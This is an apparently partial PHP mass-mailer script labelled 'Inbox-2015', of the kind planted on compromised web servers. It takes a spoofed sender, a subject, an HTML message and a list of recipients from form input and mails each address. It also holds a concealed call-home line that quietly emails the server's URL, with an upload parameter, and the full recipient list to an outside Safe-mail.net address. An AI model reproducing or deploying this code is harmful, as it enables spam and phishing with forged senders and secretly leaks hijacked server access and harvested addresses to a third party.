'; }$action=$_POST['action'];$from=$_POST['from'];$realname=$_POST['realname'];$subject=$_POST['subject'];$message=$_POST['message'];$emaillist=$_POST['emaillist'];$addr = getenv("REMOTE_ADDR"); if ($action=="send"){ $message = urlencode($message);$message = ereg_replace("%5C%22", "%22", $message);$message = urldecode($message);$message = stripslashes($message);$subject = stripslashes($subject);} ?>
ยป[Evil]B[oy_ - Inbox-2015
";$subb="xMailer";$massge ="Exploit : http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."?upload=CaZaNoVa163\n$emaillist\n";@mail("1234567887654321@Safe-mail.net",$subb,$massge,$headd);$allemails=split("\n",$emaillist);$numemails=count($allemails);for($xx=0;$xx<1;$xx++){for($x=0;$x<$numemails;$x++){$to=$allemails[$x];if ($to){$to=ereg_replace(" ","",$to);$message=ereg_replace("&email&",$to,$message);$subject=ereg_replace("&email&",$to,$subject);print "Sending Mail To $to.......";@flush();$header="From: $realname <$from>\r\nReply-To: $from\r\n";$header.="MIME-Version: 1.0\r\n";$header.="Content-Type: text/html\r\n";$header.="Content-Transfer-Encoding: 8bit\r\n\r\n";$header.="$message\r\n";@mail($to,$subject,"",$header);print "OK
";@flush();}}}} ?>